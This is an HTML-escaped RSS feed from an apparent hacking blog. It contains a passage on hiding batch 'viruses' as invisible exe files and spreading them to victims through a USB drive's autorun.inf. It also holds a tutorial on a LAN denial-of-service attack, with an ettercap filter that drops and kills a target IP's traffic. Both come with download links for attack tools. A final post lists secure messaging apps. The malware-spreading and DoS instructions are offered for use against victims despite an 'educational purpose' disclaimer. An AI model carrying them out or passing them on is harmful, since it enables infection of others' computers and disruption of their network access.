&lt;br /&gt;Limitations of Batch Viruses -: &lt;br /&gt;1.Victim can easily read the commands by opening batch file in notepad.&lt;br /&gt;2.The command prompt screen pops up,it alerts the victim and he can stop it.&lt;br /&gt;To overcome these limitations,we need to convert these batch files into executable files that is exe files.&lt;br /&gt;Download this Batch To Exe coverter from &lt;a href="http://www.ziddu.com/download/18308633/Bat_To_Exe_Converter.rar.html"&gt;here&lt;/a&gt;.Remamber the password is "darktechandhack" .&lt;br /&gt;After running converter ,  open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.  &lt;br /&gt;You can  use other options as per your requirement.&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;
&lt;ul style="list-style-type: none; margin: 1em 0px 1em 24px; padding: 0px;"&gt;
&lt;li style="margin: 0px; overflow-x: visible; overflow-y: hidden; padding: 0px 0px 0px 11px;"&gt;Spreading batch viruses through pen drive -: &lt;br /&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvv6i7ZLk8ux28bQJjUcpb67deuCSl8f-Th0lcv6Mvno5K6f6IkQdlV6Jw2ofvaVTXQQOo-muld4GLWngq0vinyTJ_xNjyZQuKWCBwktC2FJpJYvENDwZVKPHq6u270ZMNPO1_z2wghQ/s1600/mhgkil.jpg" style="background-color: rgba(255, 255, 255, 0.498039); color: grey; font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvv6i7ZLk8ux28bQJjUcpb67deuCSl8f-Th0lcv6Mvno5K6f6IkQdlV6Jw2ofvaVTXQQOo-muld4GLWngq0vinyTJ_xNjyZQuKWCBwktC2FJpJYvENDwZVKPHq6u270ZMNPO1_z2wghQ/s1600/mhgkil.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; margin: 0in 0in 0pt;"&gt;
&lt;span style="background-color: transparent;"&gt;Step 1:&lt;/span&gt;&lt;/div&gt;
Open notepad and write &lt;br /&gt;[autorun]&lt;br /&gt;open=anything.bat&lt;br /&gt;Icon=anything.ico&lt;br /&gt;Save file as ‘autorun.inf’&lt;br /&gt;Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .&lt;br /&gt;When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;
&lt;div style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="background-color: rgba(255, 255, 255, 0.498039); clear: both; font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixeVM7UP9MzHSAoPPCQbieOmWTgZr1pP3ocZdWI-noM3-rb923fnH-TiILR1lo3aN2dwr3OmS_hvka5yjFJmEMpnMwifhIPzUJoeHBGQas6Pe4xlg6v1kTq1oJ-zjABYoAiX5UDU5fXg/s1600/pk%255Bp.jpg" style="color: grey; margin: 0px 1em; padding: 0px;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixeVM7UP9MzHSAoPPCQbieOmWTgZr1pP3ocZdWI-noM3-rb923fnH-TiILR1lo3aN2dwr3OmS_hvka5yjFJmEMpnMwifhIPzUJoeHBGQas6Pe4xlg6v1kTq1oJ-zjABYoAiX5UDU5fXg/s1600/pk%255Bp.jpg" style="border: 1px solid rgb(222, 222, 222); box-sizing: border-box; height: auto !important; margin: 10px; max-width: 100%;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="background-color: rgba(255, 255, 255, 0.498039); font-family: 'Century Gothic', Arial, 'Arial Unicode MS', Helvetica, sans-serif; font-size: 11.818181991577148px;"&gt;
&lt;span style="background-color: transparent;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
Do you like this article? Follow this blog and join as a member for more interesting tricks and tips. Feel free to ask me ,if you have any doubts. To approach personally copntact my mail address in "about me". Suggest your friends to visit this blog for interesting topics.&lt;/div&gt;
&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;
&lt;br /&gt;                                              THANK YOU for reading . Visit my blog regularly and browse the blog for more interesting things...:-)&lt;br /&gt;&lt;br /&gt;Thnaks to : Prabhu Vinod Tikkisetti |&lt;br /&gt;Source : http://darktechtricks.blogspot.in/&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2014/03/creating-viruses-using-batch-programming.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlrAjl_hZFD09mXoDCXsmFo9rZrl6m9JYLLXN6yBz5UqENPrjpGeGi7WcMvzv_86n8dF6HHI5L3ym3y9QRhJ0klmJb5M_5ECOZTWS-HFdohmYiLXY5lgHht52Lg7Dzjs1SKJnXKvNm0vfC/s72-c/computer-virus-vector-hackrhino.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-6134287771600011782</guid><pubDate>Thu, 13 Mar 2014 12:40:00 +0000</pubDate><atom:updated>2014-03-13T05:55:19.282-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Back Track</category><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Denial of Service</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Hackers</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Penetration Testing</category><title>Dos Attack in Local Area Network With Ettecap</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: center;"&gt;
&lt;b&gt;Dos Attack in Local Area Network With Ettecap&lt;/b&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;b&gt;Hello Everybody Now we are going to learn how to perform Dos Attack in a lan network. THIS POST IS ONLY FOR EDUCATIONAL PURPOSE&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;First Of We Have to Need ettercap Script. Download Link &amp;nbsp;mentioned below&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: lime; font-size: large;"&gt;Zip Pass:hackhippo&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime; font-size: large;"&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;/span&gt; &lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/WFLNjg" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (Cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;br /&gt;
&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/1fro9r5buka84zw/dos.zip" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (Mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext"&gt;&lt;span style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="smalltext"&gt;&lt;span style="font-size: 9px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt; MD5: &amp;nbsp;6b74a26c0ca1f329e80a418b6a96892c&lt;span class="smalltext"&gt;&lt;span style="font-size: 9px;"&gt;&lt;br /&gt;
&lt;/span&gt;SHA1:&amp;nbsp;21835cc858ec2ac8d8c878183098fac2b1076379&lt;/span&gt;&lt;br /&gt;
&lt;span class="smalltext"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span class="smalltext"&gt;------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Our first Filter&lt;/li&gt;
&lt;li&gt;The filters allow you to change the content of packets,To create a filter, a configuration file must be compiled before being able to be used as a filter&lt;/li&gt;
&lt;li&gt;You Can Also Copy This Source Code And  open a text editor like gnome and write the following Code:&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;span class="smalltext"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span class="smalltext"&gt;------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;if (ip.src == '192.168.1.37' || ip.dst == '192.168.1.37') &lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;drop();&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;kill();&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;msg( "HackHippo~# Content Copyrighted to HACK HIPPO &amp;lt;-- Packet Dropped --&amp;gt;\n" );&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;}&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;span class="smalltext"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span class="smalltext"&gt;------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd2ST2RTg8cuHLKxxB_sYYof1JflmLqRspwX68pBeVCzMlYJlBdRM13xmJyh2KXNKzD7ZRjZV9s_ypdIERL7REr1WJin1QAytIYVhElhZMWzVaZ-rtpiG-9Yc_jvt2nogACRAFVmjTSGo/s1600/dos-attack-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd2ST2RTg8cuHLKxxB_sYYof1JflmLqRspwX68pBeVCzMlYJlBdRM13xmJyh2KXNKzD7ZRjZV9s_ypdIERL7REr1WJin1QAytIYVhElhZMWzVaZ-rtpiG-9Yc_jvt2nogACRAFVmjTSGo/s1600/dos-attack-1.png" height="201" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="smalltext"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span class="smalltext"&gt;---------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Save This File In Your Root Folder  like this Photograph mentioned below.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1fJ7XuNRsYd0H3cm4cjApFZqH9BOpx-8Etk_whuk2TrI38IClsNdSYC8VrgQzFi6RVSMMuaypXPHkgMW0ZzJ7rPtP22EN-2i1LsvmhvSahgF93esjxraJRs3cii2QuVcIbAM69EKa_oE/s1600/dos-attack-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1fJ7XuNRsYd0H3cm4cjApFZqH9BOpx-8Etk_whuk2TrI38IClsNdSYC8VrgQzFi6RVSMMuaypXPHkgMW0ZzJ7rPtP22EN-2i1LsvmhvSahgF93esjxraJRs3cii2QuVcIbAM69EKa_oE/s1600/dos-attack-2.png" height="278" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span class="smalltext"&gt;---------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="text-align: left;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="text-align: left;"&gt;&lt;b&gt;Step 3 : Need to be Encode This Script&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="text-align: left;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkxeqY2zoYXfwt3_wLx1GW7sxO1o_n69i6ZZxEz9Tmxqioxb7frYrrObZQR8q1X-5CwvHRyN0mJtcONMT9AkERlIFR9b17SKH8efZsrLI8A2T2LR67jAXPHdyZ5C3ImIpXRbKddnLEPAc/s1600/dos-attack-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkxeqY2zoYXfwt3_wLx1GW7sxO1o_n69i6ZZxEz9Tmxqioxb7frYrrObZQR8q1X-5CwvHRyN0mJtcONMT9AkERlIFR9b17SKH8efZsrLI8A2T2LR67jAXPHdyZ5C3ImIpXRbKddnLEPAc/s1600/dos-attack-3.png" height="287" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span class="smalltext"&gt;---------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;Step 4 : Start Attack&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7OoN2n9NhNRLu7rwTBLwKL2hW3lu3Sj3xPNDhpMJKWKkPa9ojQtTsY7bDGOSLrGWPRWD6yexbhYxAzN3XPlI3H_A_Nt2cl6XS9-XU5BRXtiTElEJySguPRojdsFasIQOcPTCf-p8Eczk/s1600/dos-attack-4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7OoN2n9NhNRLu7rwTBLwKL2hW3lu3Sj3xPNDhpMJKWKkPa9ojQtTsY7bDGOSLrGWPRWD6yexbhYxAzN3XPlI3H_A_Nt2cl6XS9-XU5BRXtiTElEJySguPRojdsFasIQOcPTCf-p8Eczk/s1600/dos-attack-4.png" height="185" width="250" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX9QdtdKYfmq5wXVT0qzc8_36dj_CmahvmGfjoMIABKY5PH5A1F9RPk_Hj79blbEOMc_C7NBCGEgAK4Ew1st9j4loLrlSbRTCTxCgnd7brUN5UQrSHwW-4lVvvYlIR64QrvptcriVLRM8/s1600/dos-attack-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX9QdtdKYfmq5wXVT0qzc8_36dj_CmahvmGfjoMIABKY5PH5A1F9RPk_Hj79blbEOMc_C7NBCGEgAK4Ew1st9j4loLrlSbRTCTxCgnd7brUN5UQrSHwW-4lVvvYlIR64QrvptcriVLRM8/s1600/dos-attack-5.png" height="185" width="250" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;center&gt;
© HaCkHiPp0-TeaM ! 2013&lt;/center&gt;
&lt;center&gt;
&lt;a href="http://hackhippo.blogspot.com/"&gt;http://hackhippo.blogspot.com&lt;/a&gt;.&lt;/center&gt;
&lt;center&gt;
&lt;a href="http://hackhippo.blogspot.com/"&gt;© HaCkHiPp0-TeaM&lt;/a&gt;.&lt;/center&gt;
&lt;center&gt;
&lt;a href="https://www.facebook.com/sahilrai85"&gt;R0oTx:Sahil_Rai&lt;/a&gt;&lt;/center&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2014/03/dos-attack-in-local-area-network-with.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd2ST2RTg8cuHLKxxB_sYYof1JflmLqRspwX68pBeVCzMlYJlBdRM13xmJyh2KXNKzD7ZRjZV9s_ypdIERL7REr1WJin1QAytIYVhElhZMWzVaZ-rtpiG-9Yc_jvt2nogACRAFVmjTSGo/s72-c/dos-attack-1.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-2602922439409264705</guid><pubDate>Sat, 01 Mar 2014 13:23:00 +0000</pubDate><atom:updated>2014-03-01T05:23:43.544-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Apple</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><category domain="http://www.blogger.com/atom/ns#">Mobile Hacking</category><title>Top 5 Secure Chating Apps With End-to-End Encryption </title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: center;"&gt;
Secure Your your self HAckers Everywhere&amp;nbsp;&lt;/h2&gt;
&lt;div&gt;
&lt;h3 style="text-align: left;"&gt;
Top 5 Secure Chating Apps With End-to-End Encryption&amp;nbsp;&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Telegram&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
Description:&lt;br /&gt;
&lt;div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVuUkmbTZyok11V5l4IlLNBc1goDrBJ9VK3gZvbJqjbM4ijjtkg3V7K1EFRhebp6gmCcGtP1re5r2XCzSQo7kYVhECWHBayEgm8fhUd0nC1WcfzIbzzK7wozROJqoHA6HESEz1BiIlqM8/s1600/telegram-hack-hippo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVuUkmbTZyok11V5l4IlLNBc1goDrBJ9VK3gZvbJqjbM4ijjtkg3V7K1EFRhebp6gmCcGtP1re5r2XCzSQo7kYVhECWHBayEgm8fhUd0nC1WcfzIbzzK7wozROJqoHA6HESEz1BiIlqM8/s1600/telegram-hack-hippo.png" height="320" width="216" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&amp;nbsp;Telegram is a messaging app with a focus on speed and security. It’s superfast, simple and free.&lt;/li&gt;
&lt;li&gt;With Telegram, you can create group chats with up to 200 people so you can stay connected with everyone at once. Plus, you can share videos up to 1GB, send multiple photos from the web, and forward any media you receive in an instant. All your messages are in the cloud, so you can easily access them from any of your devices.&lt;/li&gt;
&lt;li&gt;For those interested in maximum privacy, we've added Secret Chats, featuring end-to-end encryption to ensure that a message can only be read by its intended recipient. When it comes to Secret Chats, nothing is logged on our servers and you can automatically program the messages to self-destruct from both devices so there is never any record of it.&lt;/li&gt;
&lt;li&gt;We built Telegram to make messaging safe again so you can take back your right to privacy.&lt;/li&gt;
&lt;li&gt;Why Switch to Telegram?&lt;/li&gt;
&lt;li&gt;FAST: Telegram is the fastest messaging app on the market because it uses a decentralized&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwlHe6-XIfSEU0smY2A4Iu42ysfdQ23ZGZVawrP1jCu-_VXyMg0zH9JPc3RXx1aiXJw7G94DAbEJWLaUxPfVeNzq08oc50qsTzQcCsPuk-f0Uoz_f9LquYz-2LQvPoQm-4UpKlV8mvugM/s1600/telegram-hack-hippo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwlHe6-XIfSEU0smY2A4Iu42ysfdQ23ZGZVawrP1jCu-_VXyMg0zH9JPc3RXx1aiXJw7G94DAbEJWLaUxPfVeNzq08oc50qsTzQcCsPuk-f0Uoz_f9LquYz-2LQvPoQm-4UpKlV8mvugM/s1600/telegram-hack-hippo.jpg" height="320" width="216" /&gt;&lt;/a&gt;&lt;/div&gt;
infrastructure with data centers positioned around the globe to connect people to the closest possible server.&lt;/li&gt;
&lt;li&gt;SECURE: Security flaws in popular apps like WhatsApp have gotten a lot of bad press recently, so we made it our mission to provide the best security on the market.&lt;/li&gt;
&lt;li&gt;CLOUD STORAGE: Never lose your data again! Telegram offers free unlimited cloud storage for all your Telegram messages and media that you can securely access from multiple devices.&lt;/li&gt;
&lt;li&gt;GROUP CHAT &amp;amp; SHARING: With Telegram, you can form large group chats (up to 200 members), quickly share gigabyte size videos, and send all the photos you want to friends.&lt;/li&gt;
&lt;li&gt;RELIABLE: Built to deliver your messages in the minimum bytes possible, Telegram is the most reliable messaging system ever made. It even works on the weakest mobile connections!&lt;/li&gt;
&lt;li&gt;100% FREE &amp;amp; NO ADS: Telegram is free and will always be free. We do not plan to sell ads or introduce subscription fees.&lt;/li&gt;
&lt;li&gt;PRIVACY: We take your privacy very seriously and will never give third parties access to your data!&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="border-bottom: green dashed 2px; text-align: left;"&gt;
&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;a href="https://play.google.com/store/apps/details?id=org.telegram.messenger" rel="nofollow" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class="app-compatibility" style="background-color: #e5e5e5; border: 0px; color: #333333; display: inline-block; font-family: Roboto, Arial, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; padding: 0px; position: relative; vertical-align: top;"&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;b style="font-size: x-large;"&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b style="font-size: x-large;"&gt;Threema&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Description&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
Threema is a mobile messaging app that puts security first. With true end-to-end encryption, you can rest &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcnndxf-Bi0xVCqi2Bw_23hndVdYCg6ZuqLPf35n19SZVkMIRrh1yT4CEDy0SinOKnGWpwAxjGeBD_R2UXfE9t2R-ap3M8EppdI3cl81xV3nK5BELOjMe78vX-MkUKfa8OStSTiZnf-FQ/s1600/iphone_preview1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcnndxf-Bi0xVCqi2Bw_23hndVdYCg6ZuqLPf35n19SZVkMIRrh1yT4CEDy0SinOKnGWpwAxjGeBD_R2UXfE9t2R-ap3M8EppdI3cl81xV3nK5BELOjMe78vX-MkUKfa8OStSTiZnf-FQ/s1600/iphone_preview1.png" height="320" width="213" /&gt;&lt;/a&gt;&lt;/div&gt;
assured that only you and the intended recipient can read your messages.&lt;/div&gt;
